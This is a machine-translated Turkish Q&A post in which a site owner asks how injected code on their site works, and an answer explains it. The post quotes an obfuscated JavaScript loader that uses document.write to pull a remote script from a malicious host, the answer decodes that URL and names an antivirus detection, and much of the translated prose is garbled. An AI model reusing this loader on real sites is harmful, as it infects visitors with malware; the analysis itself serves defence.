Benim Cyd! web sitesi sürekli içine girildi. Birisi, bir şekilde, anahtar php komut dosyası içine aşağıdaki çöp enjekte etmeyi başardı, ama Cyd yapılandırma hakkında konuşmak değil. Site çok (bazen bu siteye sadece ziyaretçi olabilirim korkuyorum...) ziyaret etti ve çok siteyi geri yukarı ve çalışan umurumda değil. Sonunda ben hallederim.

Benim soru, nasıl bu saçma işe yarıyor mu? Ben bakmak ve ben sadece bu nasıl bir zararı sürüyor görmüyor musun? Ne bir PDF dosyası ChangeLog adlı yüklemeye çalışır.açtıktan sonra bir trojan ile enfekte olan pdf, Acrobat dondurma makinenize büyük hasara yol olacaktır. Nasıl, bilmiyorum yapar mı, umurumda değil. Ama nasıl komut, aşağıdaki parça indir çağırmak mı?

<script>/*Exception*/ document.write('<script src=' 'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '') ' defer=defer></scr' 'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->

ESET Bu kod olarak algıladı/JS TrojanDownloader.Ajan.Casus uydu trojan

replace arama devi dağınık dize sonra dikkat edin: .replace(/#|\$|@|\^|&|\(|\)|\!/ig, '').

Özel karakterlerin çoğu, normal bir URL dönüştürerek ortadan kaldırır:

evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

(Ben elle evil:) http: değişti

Normal ifade .replace(/[#$@^&()!]/ig, '') basitleştirilmiş olabilir unutmayın

Eğer senaryoyu bakarsanız, aynı etki alanından gizli bir İFRAME yolu /index.php?ys içeren enjekte çok basit bir senaryo göreceksiniz.

Fiddler Bu sayfa rica ettim, ve hiç bir içerik vardı.